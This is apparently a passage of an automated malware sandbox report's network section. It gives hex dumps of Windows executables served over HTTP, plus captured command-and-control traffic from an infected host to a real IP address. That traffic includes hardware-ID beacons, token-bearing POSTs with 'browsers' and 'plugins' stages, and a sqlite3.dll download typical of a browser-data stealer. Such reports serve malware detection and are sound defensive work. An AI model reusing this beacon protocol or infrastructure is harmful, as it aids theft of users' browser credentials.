72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 06 Dec 2024 19:52:48 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 06 Dec 2024 19:52:51 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 06 Dec 2024 19:52:52 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 06 Dec 2024 19:52:58 GMTContent-Type: application/octet-streamContent-Length: 3221504Last-Modified: Fri, 06 Dec 2024 19:41:03 GMTConnection: keep-aliveETag: "6753534f-312800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 98 01 00 00 00 00 00 00 30 31 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 31 00 00 04 00 00 44 1a 32 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 1b 31 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 98 1b 31 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 80 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 88 03 00 00 00 90 06 00 00 04 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 94 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 75 72 64 79 77 69 79 77 00 70 2a 00 00 b0 06 00 00 6c 2a 00 00 96 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 77 74 6f 78 62 6e 67 00 10 00 00 00 20 31 00 00 04 00 00 00 02 31 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 30 31 00 00 22 00 00 00 06 31 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 06 Dec 2024 19:54:09 GMTContent-Type: application/octet-streamContent-Length: 1861632Last-Modified: Fri, 06 Dec 2024 19:40:49 GMTConnection: keep-aliveETag: "67535341-1c6800"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 62 af 50 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 c6 03 00 00 ac 00 00 00 00 00 00 00 c0 49 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 49 00 00 04 00 00 48 97 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c 30 05 00 70 00 00 00 00 20 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 31 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 10 05 00 00 10 00 00 00 32 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 20 05 00 00 04 00 00 00 42 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 30 05 00 00 02 00 00 00 46 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 70 2a 00 00 40 05 00 00 02 00 00 00 48 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6b 67 73 65 63 79 78 67 00 00 1a 00 00 b0 2f 00 00 f8 19 00 00 4a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 69 6a 76 69 66 6c 79 00 10 00 00 00 b0 49 00 00 04 00 00 00 42 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 c0 49 00 00 22 00 00 00 46 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDAAEHDHIIJKECBKEBAHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 44 41 41 45 48 44 48 49 49 4a 4b 45 43 42 4b 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 43 42 39 37 33 32 30 44 44 30 46 38 30 37 36 35 36 36 31 35 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 45 48 44 48 49 49 4a 4b 45 43 42 4b 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 72 75 6d 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 45 48 44 48 49 49 4a 4b 45 43 42 4b 45 42 41 2d 2d 0d 0a Data Ascii: ------BGDAAEHDHIIJKECBKEBAContent-Disposition: form-data; name="hwid"ECB97320DD0F807656615------BGDAAEHDHIIJKECBKEBAContent-Disposition: form-data; name="build"drum------BGDAAEHDHIIJKECBKEBA--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIJKEHJJDAAKFHIDAKFHHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 4a 4b 45 48 4a 4a 44 41 41 4b 46 48 49 44 41 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 37 64 62 36 62 35 36 34 33 35 30 61 34 37 64 65 30 65 65 30 63 35 32 39 35 36 37 63 38 30 35 66 32 61 35 37 33 63 38 35 65 66 34 32 33 31 37 37 62 36 30 31 39 34 32 36 32 34 32 32 66 38 64 37 32 37 63 66 38 38 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 4b 45 48 4a 4a 44 41 41 4b 46 48 49 44 41 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 4b 45 48 4a 4a 44 41 41 4b 46 48 49 44 41 4b 46 48 2d 2d 0d 0a Data Ascii: ------FIJKEHJJDAAKFHIDAKFHContent-Disposition: form-data; name="token"627db6b564350a47de0ee0c529567c805f2a573c85ef423177b60194262422f8d727cf88------FIJKEHJJDAAKFHIDAKFHContent-Disposition: form-data; name="message"browsers------FIJKEHJJDAAKFHIDAKFH--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEGHJDGIJECGDHJJECGHHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 47 48 4a 44 47 49 4a 45 43 47 44 48 4a 4a 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 37 64 62 36 62 35 36 34 33 35 30 61 34 37 64 65 30 65 65 30 63 35 32 39 35 36 37 63 38 30 35 66 32 61 35 37 33 63 38 35 65 66 34 32 33 31 37 37 62 36 30 31 39 34 32 36 32 34 32 32 66 38 64 37 32 37 63 66 38 38 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 48 4a 44 47 49 4a 45 43 47 44 48 4a 4a 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 48 4a 44 47 49 4a 45 43 47 44 48 4a 4a 45 43 47 48 2d 2d 0d 0a Data Ascii: ------JEGHJDGIJECGDHJJECGHContent-Disposition: form-data; name="token"627db6b564350a47de0ee0c529567c805f2a573c85ef423177b60194262422f8d727cf88------JEGHJDGIJECGDHJJECGHContent-Disposition: form-data; name="message"plugins------JEGHJDGIJECGDHJJECGH--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIJDAFBKFIECBGCAKECGHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 4b 45 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 37 64 62 36 62 35 36 34 33 35 30 61 34 37 64 65 30 65 65 30 63 35 32 39 35 36 37 63 38 30 35 66 32 61 35 37 33 63 38 35 65 66 34 32 33 31 37 37 62 36 30 31 39 34 32 36 32 34 32 32 66 38 64 37 32 37 63 66 38 38 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 4b 45 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 4b 45 43 47 2d 2d 0d 0a Data Ascii: ------GIJDAFBKFIECBGCAKECGContent-Disposition: form-data; name="token"627db6b564350a47de0ee0c529567c805f2a573c85ef423177b60194262422f8d727cf88------GIJDAFBKFIECBGCAKECGContent-Disposition: form-data; name="message"fplugins------GIJDAFBKFIECBGCAKECG--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAKKEGDGCGDAKEBFIJECHost: 185.215.113.206Content-Length: 6679Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
